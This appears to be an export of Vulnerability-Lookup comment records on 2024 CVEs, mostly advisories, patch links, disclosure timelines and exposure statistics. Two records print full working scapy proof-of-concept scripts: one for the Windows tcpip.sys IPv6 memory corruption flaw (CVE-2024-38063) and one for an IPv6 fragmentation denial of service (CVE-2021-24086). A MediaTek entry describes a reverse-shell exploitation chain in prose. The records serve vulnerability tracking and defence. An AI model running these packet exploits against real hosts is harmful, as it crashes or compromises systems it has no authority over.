}

{
   uuid: "a1cef39c-8b09-4347-95bb-f4ffedfafccf",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "The Shadowserver Foundation - Statistics",
   description: "~~~\nWe are now reporting in our feeds Fortinet IPs still likely vulnerable to CVE-2024-23113 (format string pre-auth RCE). This vulnerability is known to be exploited in the wild. \n\n87,390 IPs found on 2024-10-12. Top: US (14K), Japan (5.1K), India (4.8K)\n~~~\n\nRef [Original post](https://www.linkedin.com/posts/the-shadowserver-foundation_cybersecurity-vulnerabilitymanagement-vulnerabilities-activity-7251247220493086722-IlIx?utm_source=share&utm_medium=member_desktop)\n\nRef [Shadowserver - map](https://dashboard.shadowserver.org/statistics/combined/map/?map_type=std&day=2024-10-12&source=http_vulnerable&source=http_vulnerable6&tag=cve-2024-23113%2B&geo=all&data_set=count&scale=log)\nRef [Statistics of the available vulnerable devices](https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=other&d1=2024-10-09&d2=2024-10-12&source=http_vulnerable&source=http_vulnerable6&tag=cve-2024-23113%2B&dataset=unique_ips&style=stacked)",
   description_format: "markdown",
   vulnerability: "CVE-2024-23113",
   creation_timestamp: "2024-10-13T15:21:32.545076+00:00",
   timestamp: "2024-10-13T15:21:32.545076+00:00",
   related_vulnerabilities: [
      "CVE-2024-23113",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

{
   uuid: "62ceedbe-65b3-4d7b-ab79-6c0240b18d71",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Possible commit of the patch",
   description: "From a quick analysis comparing the previous tag and the information found in the the changelog:\n\n`[Do not create a pipeline on MR refresh if source branch was deleted](https://gitlab.com/gitlab-org/security/gitlab/-/commit/3dd89a71b436e8218a5d159a1dd75cb2de078129) ([merge request](https://gitlab.com/gitlab-org/security/gitlab/-/merge_requests/4524))`\n\nthe fix of this vuln seems to be: \nhttps://gitlab.com/gitlab-org/gitlab/-/commit/480d0bd7ccdca6f93ff715abcd6c2fa7a9bebec2",
   description_format: "markdown",
   vulnerability: "cve-2024-9164",
   creation_timestamp: "2024-10-11T12:46:07.597963+00:00",
   timestamp: "2024-10-11T12:46:48.032889+00:00",
   related_vulnerabilities: [],
}

{
   uuid: "af885327-bc8d-4e07-9ea5-a86cda87beb0",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "More details from the vendor",
   description: "-  GitLab Critical Patch Release: 17.4.2, 17.3.5, 17.2.9  - [https://about.gitlab.com/releases/2024/10/09/patch-release-gitlab-17-4-2-released/](https://about.gitlab.com/releases/2024/10/09/patch-release-gitlab-17-4-2-released/)\n\nRun pipelines on arbitrary branches\n\nAn issue was discovered in GitLab EE affecting all versions starting from 12.5 prior to 17.2.9, starting from 17.3, prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows running pipelines on arbitrary branches. This is a critical severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, 9.6). It is now mitigated in the latest release and is assigned CVE-2024-9164.",
   description_format: "markdown",
   vulnerability: "cve-2024-9164",
   creation_timestamp: "2024-10-11T12:22:18.480655+00:00",
   timestamp: "2024-10-11T12:22:18.480655+00:00",
   related_vulnerabilities: [
      "CVE-2024-9164",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

{
   uuid: "4d12529b-de4a-40f8-85fb-a910c49847c3",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Critical Exploit in MediaTek Wi-Fi Chipsets: Zero-Click Vulnerability (CVE-2024-20017) Threatens Routers and Smartphones",
   description: "# Critical Exploit in MediaTek Wi-Fi Chipsets: Zero-Click Vulnerability (CVE-2024-20017) Threatens Routers and Smartphones\n\nBy Security News from https://blog.sonicwall.com/en-us/2024/09/critical-exploit-in-mediatek-wi-fi-chipsets-zero-click-vulnerability-cve-2024-20017-threatens-routers-and-smartphones/\n\nSeptember 19, 2024\n# Overview\n\nThe SonicWall Capture Labs threat research team became aware of the threat CVE-2024-20017, assessed its impact and developed mitigation measures for the vulnerability. CVE-2024-20017 is a critical zero-click vulnerability with a CVSS 3.0 score of 9.8, impacting MediaTek Wi-Fi chipsets MT7622/MT7915 and RTxxxx SoftAP driver bundles used in products from various manufacturers, including Ubiquiti, Xiaomi and Netgear. The affected versions include MediaTek SDK versions 7.4.0.1 and earlier, as well as OpenWrt 19.07 and 21.02. This translates to a large variety of vulnerable devices, including routers and smartphones. The flaw allows remote code execution without user interaction due to an out-of-bounds write issue. MediaTek has released patches to mitigate the vulnerability and users should update their devices immediately. While this vulnerability was published and patched back in March, only recently did a public PoC become available making exploitation more likely.\n\n# Technical Overview\n\nThe vulnerability resides in wappd, a network daemon included in the MediaTek MT7622/MT7915 SDK and RTxxxx SoftAP driver bundle. This service is responsible for configuring and managing wireless interfaces and access points, particularly with Hotspot 2.0 technologies. The architecture of wappd is complex, comprising the network service itself, a set of local services that interact with the device’s wireless interfaces, and communication channels between components via Unix domain sockets.  Ultimately, the vulnerability is a buffer overflow as a result of a length value taken directly from attacker-controlled packet data without bounds checking and placed into a memory copy.  This buffer overflow creates an out-of-bounds write.\n\n# Triggering the Vulnerability\n\nThe vulnerability exists in the IAPP_RcvHandlerSSB function where an attacker controlled length value is passed to the IAPP_MEM_MOVE macro as described in hyprdude’s blog and seen in Figure 1.\n\n\nFigure 1: Vulnerable Code sourced from hyprdude\n\nPrior to the last line which calls IAPP_MEM_MOVE, the only bounds check done is to check that the provided length does not exceed the maximum packet length of 1600 bytes. As the size of the destination struct is only 167 bytes, this results in a stack buffer overflow of up to 1433 bytes. To trigger this vulnerability an attacker must send a packet with the expected structures prepending the attack payload.  These structures are referred to as the RT_IAPP_HEADER and the RT_IAPP_SEND_SECURITY_BLOCK within the code.  To bypass validation checks the length of the RT_IAPP_HEADER struct needs to be small and the RT_IAPP_HEADER.Command field must be to 50.\n\nExploitation\nThe publicly available exploit code achieves remote code execution by using a global address table overwrite technique via a return-oriented programming (ROP) chain. This method leverages the `system()` call to execute commands, such as sending a reverse shell back to the attacker. The reverse shell is established using Bash and the existing Netcat tool on the chipset. Figure 2 illustrates how the reverse shell command is crafted and embedded within the payload to enable this exploitation tactic.\n\n\nFigure 2: Reverse Shell Commands\n\n# SonicWall Protections\nTo ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:\n\nIPS: 20322 MediaTek MT7915 wlan Service OOB Write 1\nIPS: 20323 MediaTek MT7915 wlan Service OOB Write 2\n# Remediation Recommendations\nDue to the availability of the exploit code, it is highly recommended that users upgrade to the latest version of the firmware for their",
   description_format: "markdown",
   vulnerability: "CVE-2024-20017",
   creation_timestamp: "2024-09-21T16:21:27.498950+00:00",
   timestamp: "2024-09-21T16:21:27.498950+00:00",
   related_vulnerabilities: [
      "CVE-2024-20017",
   ],
   meta: [
      {
         url: "https://github.com/mellow-hype/cve-2024-20017/tree/main",
      },
   ],
}

{
   uuid: "daf228ff-bf18-462b-8d03-acbd9cf60965",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE Wednesday - CVE-2024-20439 - from StarkeBlog",
   description: "[Cisco recently released an advisory for CVE-2024-20439 here. (nvd) Please note I did not discover this vulnerability, I just reverse engineered the vulnerability from the advisory](https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html) published by Nicholas Starke https://starkeblog.com/\n\n",
   description_format: "markdown",
   vulnerability: "CVE-2024-20439",
   creation_timestamp: "2024-09-21T07:26:37.729241+00:00",
   timestamp: "2024-09-21T07:26:37.729241+00:00",
   related_vulnerabilities: [
      "CVE-2024-20439",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "4e36fb63-ef06-4e9d-8f57-7b76aebf7bde",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "More details about the Veeam vulnerability",
   description: "- https://censys.com/cve-2024-40711/\n- https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/\n\n~~~\nWell, that was a complex vulnerability, requiring a lot of code-reading! We’ve successfully shown how multiple bugs can be chained together to gain RCE in a variety of versions of Veeam Backup & Replication.\n\nWe’re a little confused by Veeam’s advisory, however, which seems to be contradictory. As you may recall from the very start of the blogpost, Veeam’s advice was that versions up to and including 12.1.2.172 are vulnerable. While the title of the bug states that “A vulnerability allowing unauthenticated remote code execution (RCE)“, suggesting a world-ending CVSS 10 bug, they then proceed to label the bug as a less-serious CVSS 9.8, requiring user authentication before exploitation is possible. This is confusing, because all versions beneath 12.1.2.172 don’t require authentication to exploit, and only a change made in 12.1.2.172 made it so authentication was required (see above analysis).\n\nPerhaps Veeam simply made an error in their advisory, as we (and Code White) clearly demonstrate that authentication is not required. Hopefully, a pre-emptive change wasn’t made in 12.1.2.172 to downgrade the eventual severity of this vulnerability.\n\nRegardless of CVSS, the actual situation, as you can see above, is somewhat more nuanced than ‘RCE before 12.1.2.172':\nVersion \tStatus\n12.2.0.334 \tFully patched. Not affected by the vulnerabilities in this blogpost.\n12.1.2.172 \tAffected, but exploitation requires authentication. Low privilege users are able to execute arbitrary code.\n12.1.1.56 and earlier \tVulnerable to unauthenticated RCE.\n\nSpeaking of exploitation, we’re breaking with tradition on this bug by not releasing a full exploit chain (sorry, folks!). We’re a little worried by just how valuable this bug is to malware operators, and so are (on this occasion only) refraining from dropping a working exploit. The most we’re going to drop is this tantalizing video of exploitation, which will have to tide you over until our next post:\n~~~",
   description_format: "markdown",
   vulnerability: "cve-2024-42024",
   creation_timestamp: "2024-09-09T20:48:43.060182+00:00",
   timestamp: "2024-09-10T06:14:51.710700+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

{
   uuid: "80e30504-7622-448d-a12f-9f2454207c6d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: " MISP 2.4.197 released with many bugs fixed, a security fix and improvements.",
   description: "- [MISP 2.4.197 released with many bugs fixed, a security fix and improvements.](https://www.misp-project.org/2024/09/02/MISP.2.4.197.released.html/) The MISP release 2.4.197 ",
   description_format: "markdown",
   vulnerability: "cve-2024-45509",
   creation_timestamp: "2024-09-05T12:30:37.480867+00:00",
   timestamp: "2024-09-09T07:00:39.566529+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

{
   uuid: "4be2fca3-59f3-437e-a4db-7c0b2f8acb81",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys",
   description: "[Proof of Concept for CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063), a RCE in tcpip.sys patched on August 13th 2024.\n\nAn [analysis of the vulnerability](https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) published on August 27, 2024 by Marcus Hutchins.\n\nPoC published on GitHub on August 24, 2024.\n\n### Implementation\n\nImplementation details are available on [GitHub](https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py).\n\n```python\nfrom scapy.all import *\n\niface=''\nip_addr=''\nmac_addr=''\nnum_tries=20\nnum_batches=20\n\ndef get_packets_with_mac(i):\n    frag_id = 0xdebac1e + i\n    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])\n    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'\n    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)\n    return [first, second, third]\n\ndef get_packets(i):\n    if mac_addr != '':\n        return get_packets_with_mac(i)\n    frag_id = 0xdebac1e + i\n    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])\n    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'\n    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)\n    return [first, second, third]\n\nfinal_ps = []\nfor _ in range(num_batches):\n    for i in range(num_tries):\n        final_ps += get_packets(i) + get_packets(i)\n\nprint(\"Sending packets\")\nif mac_addr != '':\n    sendp(final_ps, iface)\nelse:\n    send(final_ps, iface)\n\nfor i in range(60):\n    print(f\"Memory corruption will be triggered in {60-i} seconds\", end='\\r')\n    time.sleep(1)\nprint(\"\")\n```",
   description_format: "markdown",
   vulnerability: "CVE-2024-38063",
   creation_timestamp: "2024-08-28T08:55:21.234923+00:00",
   timestamp: "2024-08-30T12:36:21.633241+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "e58954bd-8b24-451b-9853-c16202937347",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086",
   description: "[Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows](https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html).\n\nThis issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.\n\n### Proof of Concept\n\n```python\nimport sys\nimport random\n\nfrom scapy.all import *\n\nFRAGMENT_SIZE = 0x400\nLAYER4_FRAG_OFFSET = 0x8\n\nNEXT_HEADER_IPV6_ROUTE = 43\nNEXT_HEADER_IPV6_FRAG = 44\nNEXT_HEADER_IPV6_ICMP = 58\n\n\ndef get_layer4():\n    er = ICMPv6EchoRequest(data = \"PoC for CVE-2021-24086\")\n    er.cksum = 0xa472\n\n    return raw(er)\n\n\ndef get_inner_packet(target_addr):\n    inner_frag_id = random.randint(0, 0xffffffff)\n    print(\"**** inner_frag_id: 0x{:x}\".format(inner_frag_id))\n    raw_er = get_layer4()\n\n    # 0x1ffa Routing headers == 0xffd0 bytes\n    routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)\n    routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))\n\n    # First inner fragment header: offset=0, more=1\n    FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)\n\n    return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id\n\n\ndef send_last_inner_fragment(target_addr, inner_frag_id):\n\n    raw_er = get_layer4()\n\n    ip = IPv6(dst = target_addr)\n    # Second (and last) inner fragment header: offset=1, more=0\n    FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)\n    send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])\n\n\ndef trigger(target_addr):\n\n    inner_packet, inner_frag_id = get_inner_packet(target_addr)\n\n    ip = IPv6(dst = target_addr)\n    hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)\n\n    outer_frag_id = random.randint(0, 0xffffffff)\n\n    fragmentable_part = []\n    for i in range(len(inner_packet) // FRAGMENT_SIZE):\n        fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])\n\n    if len(inner_packet) % FRAGMENT_SIZE:\n        fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])\n\n\n    print(\"Preparing frags...\")\n    frag_offset = 0\n    frags_to_send = []\n    is_first = True\n    for i in range(len(fragmentable_part)):\n        if i == len(fragmentable_part) - 1:\n            more = 0\n        else:\n            more = 1\n\n        FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)\n\n        blob = raw(FH/fragmentable_part[i])\n        frag_offset += FRAGMENT_SIZE\n\n        frags_to_send.append(ip/hopbyhop/blob)\n\n\n    print(\"Sending {} frags...\".format(len(frags_to_send)))\n    for frag in frags_to_send:\n        send(frag)\n\n\n    print(\"Now sending the last inner fragment to trigger the bug...\")\n    send_last_inner_fragment(target_addr, inner_frag_id)\n\n\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        print('Usage: cve-2021-24086.py <IPv6 addr>')\n        sys.exit(1)\n    trigger(sys.argv[1])\n\t```",
   description_format: "markdown",
   vulnerability: "CVE-2021-24086",
   creation_timestamp: "2024-08-28T09:53:22.190586+00:00",
   timestamp: "2024-08-30T12:27:27.331911+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "97b65c3a-146f-4c97-9b47-6dd15cb179ad",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "More details about the update process on the AMD website",
   description: "\"AMD plans to release the Platform Initialization (PI) firmware version indicated below. \" The release scheduled is mentioned there:\n\nhttps://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html\n\n\nIt also depends of the AGESA update process for some motherboards.",
   description_format: "markdown",
   vulnerability: "cve-2023-31315",
   creation_timestamp: "2024-08-22T07:48:09.609279+00:00",
   timestamp: "2024-08-22T07:59:33.336961+00:00",
   related_vulnerabilities: [],
}

{
   uuid: "739d2f08-5639-4fd0-8e7f-526b3443ff54",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: " KB5025885: How to manage the Windows Boot Manager revocations for Secure Boot changes associated with CVE-2023-24932",
   description: "- [KB5025885: How to manage the Windows Boot Manager revocations for Secure Boot changes associated with CVE-2023-24932](https://support.microsoft.com/en-us/topic/kb5025885-how-to-manage-the-windows-boot-manager-revocations-for-secure-boot-changes-associated-with-cve-2023-24932-41a975df-beb2-40c1-99a3-b3ff139f832d)",
   description_format: "markdown",
   vulnerability: "CVE-2023-24932",
   creation_timestamp: "2024-08-02T21:39:30.732348+00:00",
   timestamp: "2024-08-02T21:39:30.732348+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: "https://support.microsoft.com/en-us/topic/kb5025885-how-to-manage-the-windows-boot-manager-revocations-for-secure-boot-changes-associated-with-cve-2023-24932-41a975df-beb2-40c1-99a3-b3ff139f832d",
      },
   ],
}

{
   uuid: "501e7a04-3a1e-4ac4-b24b-6ff22b0b554d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Potential typo in the CVE summary",
   description: "As mentioned in [this toot](https://social.circl.lu/@fl@infosec.exchange/112876958526263355), it seems the group name is `ESX Admins` and not `ESXi Admins`. \n",
   description_format: "markdown",
   vulnerability: "CVE-2024-37085",
   creation_timestamp: "2024-08-01T20:57:15.091620+00:00",
   timestamp: "2024-08-01T20:57:15.091620+00:00",
   related_vulnerabilities: [],
}

{
   uuid: "f5ac1ede-8d1c-409b-b6bc-ce202e11fc90",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Timeline of reporting, publication/disclosure and fix",
   description: "The timeline on https://bugzilla.tianocore.org/show_bug.cgi?id=3387 is interesting:\n\n- 2021-05-10 16:43 UTC  - Bug reported by John Mathews \n-  2021-07-07 14:02:27  - Working patch mentioned by Vincent Zimmer  (and also recommends the need of a CVE)\n- 2022-05-10 21:04:45 UTC  \"Blackduck has this CVE in their database so this CVE is being flagged for all edk2 products that are scanned.\"\n- 2022-06-14 05:52:10 UTC - Patch doesn't build.\n- 2022-11-04 - Patch merged in the repo https://github.com/tianocore/edk2/commit/cab1f02565d3b29081dd21afb074f35fdb4e1fd6\n\nBut the vulnerability was published 2022-03-03 21:53 or is the timeline incorrect? \n",
   description_format: "markdown",
   vulnerability: "CVE-2021-38578",
   creation_timestamp: "2024-07-27T08:42:43.664278+00:00",
   timestamp: "2024-07-27T08:42:43.664278+00:00",
   related_vulnerabilities: [],
}

{
   uuid: "a309d024-2714-4a81-a425-60f83f6d5740",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Additional information from CSIRT/CERTs",
   description: "# Additional information from CSIRT/CERTs about Cisco Secure Email Gateway vulnerability\n\n- [IE](https://www.ncsc.gov.ie/pdfs/CiscoSecureEmailGateway_Vuln.pdf)\n- [FI](https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_18/2024)\n- [SE](https://www.cert.se/2024/07/bm24-003-kritisk-sarbarhet-i-cisco-secure-email-gateway.html)\n- [ES](https://www.incibe.es/incibe-cert/alerta-temprana/avisos/multiples-vulnerabilidades-en-productos-cisco-0)",
   description_format: "markdown",
   vulnerability: "CVE-2024-20401",
   creation_timestamp: "2024-07-19T07:16:54.446520+00:00",
   timestamp: "2024-07-19T07:19:41.157834+00:00",
   related_vulnerabilities: [],
}

{
   uuid: "dde1219a-14e2-47e0-9be7-64b42823c889",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "New intelligence shows that exploitation of this RCE vulnerability does not require authentication",
   description: "# Exploited Unauthenticated RCE Vulnerability CVE-2023-6548 in Citrix NetScaler ADC and NetScaler Gateway\n\nNew intelligence shows that exploitation of this RCE vulnerability does not require authentication\n\nhttps://digital.nhs.uk/cyber-alerts/2024/cc-4525\n\n\nThe NHS England National Cyber Security Operations Centre (CSOC) is aware of intelligence provided by CrowdStrike that contrary to Citrix’s initial disclosure, the vulnerability known as CVE-2023-6548 does not require user privileges for exploitation. NHS England National CSOC now assesses CVE-2023-6548 as a critical vulnerability that can allow a remote, unauthenticated attacker to execute remote code on a vulnerable NetScaler Gateway or NetScaler ADC device.\n\nCVE-2023-6548 has two different CVSSv3 scores attributed to it. The NIST National Vulnerability Database (NVD) has classified it as having a score of 8.8, while Citrix rates the vulnerability at 5.5. The weakness is Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway and could allow a remote, unauthenticated attacker with access to the management interface to execute arbitrary code.\n",
   description_format: "markdown",
   vulnerability: "CVE-2023-6548",
   creation_timestamp: "2024-07-17T15:49:25.225853+00:00",
   timestamp: "2024-07-17T15:49:25.225853+00:00",
   related_vulnerabilities: [],
}

{
   uuid: "5b42805e-e354-4697-945f-8c62633ca40f",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Detecting script in Postscript - if you run a vulnerable version of Ghostscript",
   description: "Detecting script in Postscript - if you run a vulnerable version of Ghostscript\n\nhttps://codeanlabs.com/wp-content/uploads/2024/06/CVE-2024-29510_testkit.ps\n\n~~~\nghostscript -q -dNODISPLAY -dBATCH CVE-2024-29510_testkit.ps\n~~~\n\nFor more details about the vulnerability [https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/](https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/)\n\nReference to the patch: [https://ghostscript.readthedocs.io/en/gs10.03.1/News.html?utm_source=ghostscript&utm_medium=website&utm_content=inline-link#Version10.03.1](https://ghostscript.readthedocs.io/en/gs10.03.1/News.html?utm_source=ghostscript&utm_medium=website&utm_content=inline-link#Version10.03.1)",
   description_format: "markdown",
   vulnerability: "CVE-2024-29510",
   creation_timestamp: "2024-07-10T07:33:50.157197+00:00",
   timestamp: "2024-07-10T07:33:50.157197+00:00",
   related_vulnerabilities: [],
}

{
   uuid: "c83a5095-cd84-42e7-858b-3979ae75e818",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2024-6387 HASSH Fingerprints",
   description: "# CVE-2024-6387 HASSH Fingerprints\n\nHASSH fingerprints for identifying OpenSSH servers potentially vulnerable to CVE-2024-6387 (regreSSHion).\n\nThe primary goal of this repository is to share the generated HASSH fingerprint database. The scripts use the Shodan API to compile a list of HASSH fingerprints for vulnerable OpenSSH versions. The generated database can be used to query Shodan or Censys to identify potentially vulnerable OpenSSH servers. The hasshdb.txt database can also be used with my Nmap NSE script available at hassh-utils.\n\nfrom: [https://github.com/0x4D31/cve-2024-6387_hassh](https://github.com/0x4D31/cve-2024-6387_hassh)",
   description_format: "markdown",
   vulnerability: "cve-2024-6387",
   creation_timestamp: "2024-07-07T06:21:50.543465+00:00",
   timestamp: "2024-07-07T06:21:50.543465+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: "https://github.com/0x4D31/cve-2024-6387_hassh",
      },
   ],
}

{
   uuid: "0f4da02a-c499-4a21-ae10-a36365226b09",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "The most important part of this CSAF entry \"Currently, no products are known to be affected. \"",
   description: "The most important part of this CSAF entry \"Currently, no products are known to be affected. \" It could be changed soon depending of the findings. ",
   description_format: "markdown",
   vulnerability: "cisco-sa-openssh-rce-2024",
   creation_timestamp: "2024-07-04T07:40:23.870739+00:00",
   timestamp: "2024-07-04T07:40:23.870739+00:00",
   related_vulnerabilities: [],
}